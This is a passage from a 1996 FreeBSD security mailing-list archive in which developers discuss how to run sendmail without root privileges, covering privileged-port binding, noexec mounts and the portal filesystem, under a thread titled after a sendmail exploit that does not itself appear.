X-Loop: FreeBSD.org
Precedence: bulk

In message you write:
>In message <9611180312.AA15775@communica.com.au> Mark Newton writes:
>: ... create the mailbox at the same time that you create
>: the user ...
>
>And if that file is ever removed? Then you are SOL.

Then you exit with EX_TEMPFAIL and log an error. sendmail will keep the mail in the queue, and the person monitoring the logs will notice and recreate the missing mailbox.

Bill

From owner-freebsd-security Mon Nov 18 09:11:04 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA28101 for security-outgoing; Mon, 18 Nov 1996 09:11:04 -0800 (PST)
Received: from fps.biblos.unal.edu.co ([168.176.37.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id JAA28078 for ; Mon, 18 Nov 1996 09:10:49 -0800 (PST)
From: pgiffuni@fps.biblos.unal.edu.co
Received: from localhost by fps.biblos.unal.edu.co (AIX 4.1/UCB 5.64/4.03) id AA37368; Mon, 18 Nov 1996 12:15:30 -0500
Date: Mon, 18 Nov 1996 12:15:30 -0500 (EST)
To: Marc Slemko
Cc: Poul-Henning Kamp , freebsd-security@FreeBSD.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To:
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

I run it under inetd, as tcp_wrappers needs it there.

BTW if someone is writing from an "UNKNOWN" host I can't hear you !!

Pedro.

On Mon, 18 Nov 1996, Marc Slemko wrote:

> What does sendmail need to do WRT binding to ports that a webserver
> doesn't? Programs such as webservers work quite well with a parent
> process running as root that binds to the port and forks children running as
> some non-root uid to handle requests. Why couldn't (this part) of
> sendmail's problems be fixed the same way?
>
> On Mon, 18 Nov 1996, Poul-Henning Kamp wrote:
>
> > What we REALLY need, is a way for root, to hand out certain privileges.
> >
> > Imagine this:
> >
> > sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp`
> > sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp`
> > sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp`
> > sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp`
> >
> > This means that users with UID smtp can bind to socket 25 (aka smtp),
> > and so on. Now sendmail NEVER needs to be root.
> >
> > How's that for security ?
> >

From owner-freebsd-security Mon Nov 18 09:16:55 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA28492 for security-outgoing; Mon, 18 Nov 1996 09:16:55 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA28486; Mon, 18 Nov 1996 09:16:52 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id JAA15646; Mon, 18 Nov 1996 09:16:36 -0800 (PST)
From: Don Lewis
Message-Id: <199611181716.JAA15646@salsa.gv.ssi1.com>
Date: Mon, 18 Nov 1996 09:16:35 -0800
In-Reply-To: Bill Fenner "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 8:42am)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Bill Fenner , Don Lewis
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: chat@freebsd.org, security@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 18, 8:42am, Bill Fenner wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} In message <199611180918.BAA15007@salsa.gv.ssi1.com> you write:
} >I don't need a compiler, and I don't want to make
} >it any easier than necessary for some cracker d00d to compile his r00t
} >kit.
}
} If you want to save space, that's fine, but don't delude yourself by thinking
} that your cracker d00d can't just go find someone on IRC with a FreeBSD box
} who will send him binaries.

I'm not counting on gaining much security that way, but my philosophy is to remove everything that isn't absolutely needed. What isn't present can't be used against me. I do consider the importation of any files to be a security breach.

I just thought of a totally wicked way of guarding against imported binaries, though. Just randomize the syscall numbers when building the kernel and userland binaries. For best effect, the userland binaries should be statically linked and the shared libraries removed. As long as the kernel can withstand crashme, it should be fine ;-) Too bad it looks like such a pain to do this :-(

Another possibility would be to digitally sign all the binaries and hack the kernel to only run binaries with the proper signature.
--- Truck

From owner-freebsd-security Mon Nov 18 09:59:32 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id JAA01437 for security-outgoing; Mon, 18 Nov 1996 09:59:32 -0800 (PST)
Received: from brimstone.gage.com (brimstone.gage.com [205.217.2.10]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id JAA01432 for ; Mon, 18 Nov 1996 09:59:29 -0800 (PST)
Received: (from mail@localhost) by brimstone.gage.com (8.8.3/8.7.3) id LAA03165; Mon, 18 Nov 1996 11:58:54 -0600 (CST)
Received: from octopus.gage.com(158.60.57.50) by brimstone.gage.com via smap (V2.0beta) id xma003163; Mon, 18 Nov 96 11:58:33 -0600
Received: from squid.gage.com (squid [158.60.57.101]) by octopus.gage.com (8.7.5/8.7.3) with SMTP id LAA15965; Mon, 18 Nov 1996 11:49:16 -0600 (CST)
Received: from schemer by squid.gage.com (NX5.67e/NX3.0S) id AA29784; Mon, 18 Nov 96 11:49:10 -0600
Message-Id: <9611181749.AA29784@squid.gage.com>
Received: by schemer.gage.com (NX5.67g/NX3.0X) id AA01926; Mon, 18 Nov 96 11:49:34 -0600
Content-Type: text/plain
Mime-Version: 1.0 (NeXT Mail 4.0 v146.2)
In-Reply-To: <96Nov18.085003pst.177557@crevenia.parc.xerox.com>
X-Nextstep-Mailer: Mail 3.3 (Enhance 1.3)
Received: by NeXT.Mailer (1.146.2)
From: Ben Black
Date: Mon, 18 Nov 96 11:49:32 -0600
To: Bill Fenner
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: Michael Smith , freebsd-security@freebsd.org
References: <96Nov18.085003pst.177557@crevenia.parc.xerox.com>
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>It is, of course, possible to run as root for *just long enough* to bind to
>port 25. Then setuid("smtp").
>

Even better would be finer grained control over access to low numbered ports so you wouldn't need to be root to bind port 25.

b3n

From owner-freebsd-security Mon Nov 18 10:11:23 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA01991 for security-outgoing; Mon, 18 Nov 1996 10:11:23 -0800 (PST)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA01978 for ; Mon, 18 Nov 1996 10:11:18 -0800 (PST)
Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPY9n-0004uG-00; Mon, 18 Nov 1996 11:10:55 -0700
To: Bill Fenner
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: Michael Smith , freebsd-security@freebsd.org
In-reply-to: Your message of "Mon, 18 Nov 1996 08:50:01 PST." <96Nov18.085003pst.177557@crevenia.parc.xerox.com>
References: <96Nov18.085003pst.177557@crevenia.parc.xerox.com>
Date: Mon, 18 Nov 1996 11:10:55 -0700
From: Warner Losh
Message-Id:
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

In message <96Nov18.085003pst.177557@crevenia.parc.xerox.com> Bill Fenner writes:
: It is, of course, possible to run as root for *just long enough* to bind to
: port 25. Then setuid("smtp").

You then must give up running the shell scripts in the users' .forward file as that user. mail.local doesn't do this, btw.

Warner

From owner-freebsd-security Mon Nov 18 10:18:50 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA02328 for security-outgoing; Mon, 18 Nov 1996 10:18:50 -0800 (PST)
Received: from grackle.grondar.za (grackle.grondar.za [196.7.18.131]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA02318; Mon, 18 Nov 1996 10:18:46 -0800 (PST)
Received: from grackle.grondar.za (localhost.grondar.za [127.0.0.1]) by grackle.grondar.za (8.8.2/8.7.3) with ESMTP id UAA12284; Mon, 18 Nov 1996 20:17:38 +0200 (SAT)
Message-Id: <199611181817.UAA12284@grackle.grondar.za>
To: Don Lewis
cc: Bill Fenner , chat@freebsd.org, security@freebsd.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Date: Mon, 18 Nov 1996 20:17:37 +0200
From: Mark Murray
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

Don Lewis wrote:
> I'm not counting on gaining much security that way, but my philosophy
> is to remove everything that isn't absolutely needed. What isn't present
> can't be used against me. I do consider the importation of any files
> to be a security breach.
>
> I just thought of a totally wicked way of guarding against imported binaries,
> though. Just randomize the syscall numbers when building the kernel and
> userland binaries. For best effect, the userland binaries should be
> statically linked and the shared libraries removed. As long as the kernel
> can withstand crashme, it should be fine ;-) Too bad it looks like such
> a pain to do this :-(

Much easier is to put the users onto a volume that is mounted -noexec. This works for compiled binaries, not scripts.

M
--
Mark Murray                  PGP key fingerprint = 80 36 6E 40 83 D6 8A 36
This .sig is umop ap!sdn.                          BC 06 EA 0E 7A F2 CE CE

From owner-freebsd-security Mon Nov 18 10:19:41 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA02437 for security-outgoing; Mon, 18 Nov 1996 10:19:41 -0800 (PST)
Received: from alpha.xerox.com (alpha.Xerox.COM [13.1.64.93]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id KAA02432 for ; Mon, 18 Nov 1996 10:19:37 -0800 (PST)
Received: from crevenia.parc.xerox.com ([13.2.116.11]) by alpha.xerox.com with SMTP id <17626(1)>; Mon, 18 Nov 1996 10:18:46 PST
Received: by crevenia.parc.xerox.com id <177557>; Mon, 18 Nov 1996 10:18:25 -0800
From: Bill Fenner
To: fenner@parc.xerox.com, imp@village.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: freebsd-security@freebsd.org, msmith@atrad.adelaide.edu.au
Message-Id: <96Nov18.101825pst.177557@crevenia.parc.xerox.com>
Date: Mon, 18 Nov 1996 10:18:10 PST
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

>You then must give up running the shell scripts in the users' .forward
>file as that user. mail.local doesn't do this, btw.

Sorry, I forgot about this since Xerox doesn't allow .forward files at all.

Bill

From owner-freebsd-security Mon Nov 18 10:31:13 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA03114 for security-outgoing; Mon, 18 Nov 1996 10:31:13 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA03102; Mon, 18 Nov 1996 10:31:05 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id KAA15909; Mon, 18 Nov 1996 10:30:55 -0800 (PST)
From: Don Lewis
Message-Id: <199611181830.KAA15909@salsa.gv.ssi1.com>
Date: Mon, 18 Nov 1996 10:30:55 -0800
In-Reply-To: Mark Murray "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 8:17pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Mark Murray
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: chat@freebsd.org, security@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 18, 8:17pm, Mark Murray wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
}
} Much easier is to put the users onto a volume that is mounted -noexec.
} This works for compiled binaries, not scripts.

Users, what users?

Oh, I'm definitely doing the -noexec thing on anything that's writable, and -rdonly on anything that has executables. Not to mention nosuid and nodev as appropriate.

Since I'm removing most of the binaries, I'm not too worried about scripts, even assuming they could get executed in spite of my other measures. There's only so much that you can do with cat and echo ;-)

--- Truck

From owner-freebsd-security Mon Nov 18 10:34:38 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA03302 for security-outgoing; Mon, 18 Nov 1996 10:34:38 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA03296 for ; Mon, 18 Nov 1996 10:34:34 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id KAA15915; Mon, 18 Nov 1996 10:32:32 -0800 (PST)
From: Don Lewis
Message-Id: <199611181832.KAA15915@salsa.gv.ssi1.com>
Date: Mon, 18 Nov 1996 10:32:32 -0800
In-Reply-To: Ben Black "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 11:49am)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Ben Black , Bill Fenner
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: freebsd-security@FreeBSD.org
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 18, 11:49am, Ben Black wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} >It is, of course, possible to run as root for *just long enough* to bind to
} >port 25. Then setuid("smtp").
} >
}
} even better would be finer grained control over access to low numbered ports
} so you wouldn't need to be root to bind port 25.

Be careful, that blade cuts both ways. If you do this then you only need to be able to gain access to the smtp user in order to steal the mail. This may be easier than attacking root.

--- Truck

From owner-freebsd-security Mon Nov 18 10:45:46 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id KAA03796 for security-outgoing; Mon, 18 Nov 1996 10:45:46 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id KAA03791 for ; Mon, 18 Nov 1996 10:45:44 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id KAA15940; Mon, 18 Nov 1996 10:45:39 -0800 (PST)
From: Don Lewis
Message-Id: <199611181845.KAA15940@salsa.gv.ssi1.com>
Date: Mon, 18 Nov 1996 10:45:39 -0800
In-Reply-To: Poul-Henning Kamp "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 8:30am)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Poul-Henning Kamp
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: freebsd-security@FreeBSD.org
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 18, 8:30am, Poul-Henning Kamp wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} What we REALLY need, is a way for root, to hand out certain privileges.
}
} Imagine this:
}
} sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp`
} sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp`
} sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp`
} sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp`
}
} This means that users with UID smtp can bind to socket 25 (aka smtp),
} and so on. Now sendmail NEVER needs to be root.

I was thinking more along the lines of chroot(), but for port numbers. Root could mark a process and its descendants as having access to port 25, and other processes and their descendants as never having access to port 25, even if they are root. I'd have two independent sets of limits, one for run-of-the-mill processes and one for "privileged" processes. Of course, the average processes wouldn't be able to access anything the "privileged" ones couldn't.

Of course, our schemes could be combined and access granted to the intersection of the two sets.
--- Truck

From owner-freebsd-security Mon Nov 18 11:21:52 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA06037 for security-outgoing; Mon, 18 Nov 1996 11:21:52 -0800 (PST)
Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id LAA06016 for ; Mon, 18 Nov 1996 11:21:47 -0800 (PST)
Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id OAA14295; Mon, 18 Nov 1996 14:16:10 -0500
From: Adam Shostack
Message-Id: <199611181916.OAA14295@homeport.org>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To: <199611181845.KAA15940@salsa.gv.ssi1.com> from Don Lewis at "Nov 18, 96 10:45:39 am"
To: Don.Lewis@tsc.tdk.com (Don Lewis)
Date: Mon, 18 Nov 1996 14:16:10 -0500 (EST)
Cc: phk@critter.tfs.com, freebsd-security@FreeBSD.org
X-Mailer: ELM [version 2.4ME+ PL27 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Don Lewis wrote:
| On Nov 18, 8:30am, Poul-Henning Kamp wrote:
| } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
|
| } What we REALLY need, is a way for root, to hand out certain privileges.
| }
| } Imagine this:
| }
| } sysctl -w net.inet.tcp.uidforport.25=`id -ur smtp`
| } sysctl -w net.inet.tcp.uidforport.20=`id -ur ftp`
| } sysctl -w net.inet.tcp.uidforport.21=`id -ur ftp`
| } sysctl -w net.inet.tcp.uidforport.119=`id -ur nntp`
| }
| } This means that users with UID smtp can bind to socket 25 (aka smtp),
| } and so on. Now sendmail NEVER needs to be root.
|
| I was thinking more along the lines of chroot(), but for port numbers.
| Root could mark a process and its descendants as having access to port 25,
| and other processes and their descendants as never having access to port 25,
| even if they are root. I'd have two independent sets of limits, one for
| run-of-the-mill processes and one for "privileged" processes. Of course,
| the average processes wouldn't be able to access anything the "privileged"
| ones couldn't.

If network access went through the file system, then chown smtp /dev/tcp/smtp would give us a known access control mechanism, rather than trying to extend the process table.

Adam

--
"It is seldom that liberty of any kind is lost all at once."
-Hume

From owner-freebsd-security Mon Nov 18 11:35:57 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id LAA07056 for security-outgoing; Mon, 18 Nov 1996 11:35:57 -0800 (PST)
Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id LAA07044 for ; Mon, 18 Nov 1996 11:35:49 -0800 (PST)
Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id LAA16011; Mon, 18 Nov 1996 11:35:16 -0800 (PST)
From: Don Lewis
Message-Id: <199611181935.LAA16011@salsa.gv.ssi1.com>
Date: Mon, 18 Nov 1996 11:35:16 -0800
In-Reply-To: Adam Shostack "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 2:16pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Adam Shostack , Don.Lewis@tsc.tdk.com (Don Lewis)
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: phk@critter.tfs.com, freebsd-security@FreeBSD.org
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 18, 2:16pm, Adam Shostack wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
}
} If network access went through the file system, then
} chown smtp /dev/tcp/smtp would give us a known access control
} mechanism, rather than trying to extend the process table.

Yeah, something like that, but the usual semantics folks talk about are open("/dev/tcp/remote-address/remote-port", ...). It is really desirable to set permissions on both the local address/port and the remote address/port (user foo is only allowed to connect to port 1234 on serverA using a port in the range 2000-2050). Handling port ranges gets a bit messy, too.

Then there's the nastiness of what to do about chrooted processes. You really want to be able to map a subset of the network space into their filesystem space.

I think mapping network accesses into filesystem space is the way to go, but I don't know how to get the semantics right.
--- Truck

From owner-freebsd-security Mon Nov 18 12:42:34 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id MAA10279 for security-outgoing; Mon, 18 Nov 1996 12:42:34 -0800 (PST)
Received: from quackerjack.cc.vt.edu (quackerjack.cc.vt.edu [198.82.160.250]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id MAA10268 for ; Mon, 18 Nov 1996 12:42:30 -0800 (PST)
Received: from sable.cc.vt.edu (sable.cc.vt.edu [128.173.16.30]) by quackerjack.cc.vt.edu (8.7.1/8.7.1) with SMTP id PAA01572; Mon, 18 Nov 1996 15:42:16 -0500 (EST)
Received: from alsatian.cslab.vt.edu (alsatian.cslab.vt.edu [198.82.184.11]) by sable.cc.vt.edu (8.6.12/8.6.12) with SMTP id PAA04565; Mon, 18 Nov 1996 15:42:15 -0500
Received: from husky.cslab.vt.edu by alsatian.cslab.vt.edu (5.65v3.2/1.1.10.5/18Sep96-0417PM) id AA15993; Mon, 18 Nov 1996 15:42:14 -0500
From: Jeff Aitken Received: by husky.cslab.vt.edu (5.65v3.2/1.1.10.5/22Aug96-1216PM) id AA26448; Mon, 18 Nov 1996 15:42:13 -0500 Message-Id: <9611182042.AA26448@husky.cslab.vt.edu> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: Don.Lewis@tsc.tdk.com (Don Lewis) Date: Mon, 18 Nov 1996 15:42:13 -0500 (EST) Cc: freebsd-security@FreeBSD.org In-Reply-To: <199611181935.LAA16011@salsa.gv.ssi1.com> from "Don Lewis" at Nov 18, 96 11:35:16 am X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

Don Lewis writes:
> On Nov 18, 2:16pm, Adam Shostack wrote:
> } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
> }
> } If network access went through the file system, then
> } chown smtp /dev/tcp/smtp would give us a known access control
> } mechanism, rather than trying to extend the process table.
>
> I think mapping network accesses into filesystem space is the way to
> go, but I don't know how to get the semantics right.

Am I mis-remembering things, or is this exactly the sort of thing the portal filesystem is supposed to provide? I don't have my 4.4BSD book handy, but I seem to recall reading about this kind of feature.

--
Jeff Aitken jaitken@dimension.net

From owner-freebsd-security Mon Nov 18 13:28:50 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA12925 for security-outgoing; Mon, 18 Nov 1996 13:28:50 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id NAA12910 for ; Mon, 18 Nov 1996 13:28:40 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id NAA16195; Mon, 18 Nov 1996 13:27:19 -0800 (PST)
From: Don Lewis Message-Id: <199611182127.NAA16195@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 13:27:19 -0800 In-Reply-To: Jeff Aitken "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 3:42pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Jeff Aitken , Don.Lewis@tsc.tdk.com (Don Lewis) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@FreeBSD.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

On Nov 18, 3:42pm, Jeff Aitken wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} Don Lewis writes:
} > On Nov 18, 2:16pm, Adam Shostack wrote:
} > } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} > }
} > } If network access went through the file system, then
} > } chown smtp /dev/tcp/smtp would give us a known access control
} > } mechanism, rather than trying to extend the process table.
} >
} > I think mapping network accesses into filesystem space is the way to
} > go, but I don't know how to get the semantics right.
}
} Am I mis-remembering things, or is this exactly the sort of thing the
} portal filesystem is supposed to provide? I don't have my 4.4BSD book
} handy, but I seem to recall reading about this kind of feature.

Sort of, though the classical implementation only allows you to specify the remote address for the network connection. Also, there's no way to do a chown(), so any access rights checking has to be performed by the portal daemon rather than by filesystem permission bits.

--- Truck

From owner-freebsd-security Mon Nov 18 13:59:39 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA15503 for security-outgoing; Mon, 18 Nov 1996 13:59:39 -0800 (PST) Received: (from jmb@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id NAA15497; Mon, 18 Nov 1996 13:59:36 -0800 (PST)
From: "Jonathan M. Bresler" Message-Id: <199611182159.NAA15497@freefall.freebsd.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: black@gage.com (Ben Black) Date: Mon, 18 Nov 1996 13:59:35 -0800 (PST) Cc: fenner@parc.xerox.com, msmith@atrad.adelaide.edu.au, freebsd-security@freebsd.org In-Reply-To: <9611181749.AA29784@squid.gage.com> from "Ben Black" at Nov 18, 96 11:49:32 am X-Mailer: ELM [version 2.4 PL24] Content-Type: text Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

Ben Black wrote:
>
> >It is, of course, possible to run as root for *just long enough* to bind to
> >port 25. Then setuid("smtp").
> >
>
> even better would be finer grained control over access to low numbered ports
> so you wouldn't need to be root to bind port 25.

portals. someone needs to finish jan-simon pendry's work ;( then each port has filesystem protection semantics and this becomes very easy.

jmb
--
Jonathan M. Bresler FreeBSD Postmaster jmb@FreeBSD.ORG FreeBSD--4.4BSD Unix for PC clones, source included. http://www.freebsd.org/ PGP 2.6.2 Fingerprint: 31 57 41 56 06 C1 40 13 C5 1C E3 E5 DC 62 0E FB

From owner-freebsd-security Mon Nov 18 15:39:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id PAA22732 for security-outgoing; Mon, 18 Nov 1996 15:39:48 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id PAA22703 for ; Mon, 18 Nov 1996 15:39:29 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id SAA15752; Mon, 18 Nov 1996 18:35:13 -0500
From: Adam Shostack Message-Id: <199611182335.SAA15752@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9611182042.AA26448@husky.cslab.vt.edu> from Jeff Aitken at "Nov 18, 96 03:42:13 pm" To: jaitken@cslab.vt.edu (Jeff Aitken) Date: Mon, 18 Nov 1996 18:35:12 -0500 (EST) Cc: Don.Lewis@tsc.tdk.com, freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk

Jeff Aitken wrote:
| Don Lewis writes:
| > On Nov 18, 2:16pm, Adam Shostack wrote:
| > } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
| > }
| > } If network access went through the file system, then
| > } chown smtp /dev/tcp/smtp would give us a known access control
| > } mechanism, rather than trying to extend the process table.
| >
| > I think mapping network accesses into filesystem space is the way to
| > go, but I don't know how to get the semantics right.
|
| Am I mis-remembering things, or is this exactly the sort of thing the
| portal filesystem is supposed to provide? I don't have my 4.4BSD book
| handy, but I seem to recall reading about this kind of feature.

It does indeed mention this, and suggests a semantic of /net/tcp/McKusick.com/smtp. It refers to a paper by Stevens & Pendry (Portals in 4.4BSD, Jan 95 Usenix proceedings). Page 237 of 4.4bsd.

Adam
--
"It is seldom that liberty of any kind is lost all at once."
-Hume From owner-freebsd-security Mon Nov 18 20:20:48 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA12775 for security-outgoing; Mon, 18 Nov 1996 20:20:48 -0800 (PST) Received: from cwsys.cwent.com (cschuber.net.gov.bc.ca [142.31.240.113]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA12770 for ; Mon, 18 Nov 1996 20:20:40 -0800 (PST) Received: from cwsys (1000@localhost [127.0.0.1]) by cwsys.cwent.com (8.8.3/8.6.10) with ESMTP id UAA01555; Mon, 18 Nov 1996 20:19:51 -0800 (PST) Message-Id: <199611190419.UAA01555@cwsys.cwent.com> Reply-to: cschuber@uumail.gov.bc.ca X-Mailer: Xmh To: "az.com" cc: freebsd-security@freebsd.org Subject: Re: grand alternatives to chroot, solution to the age-old root problem In-reply-to: Your message of "Sun, 17 Nov 1996 13:56:56 PST." Date: Mon, 18 Nov 1996 20:19:48 -0800 
From: Cy Schubert Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk

> Has anyone considered enabling 'virtual-machines' on UNIX? Why not
> dedicate a physical machine to this purpose and firewall it off from the
> rest by making each virtual machine appear to be gatewayed via a
> point-point connection to the main subnet. Each user telnets into a unix
> logical "machine" with a distinct IP address of their own. The 'mother'
> kernel above provides a socket to the IP world disallowing sniffing and
> also provides a bandwidth usage auditor and choke. (It looks like a
> completely separate box with its own init, etc.) Each user gets complete
> control in their own machine with access to their web server, programs,
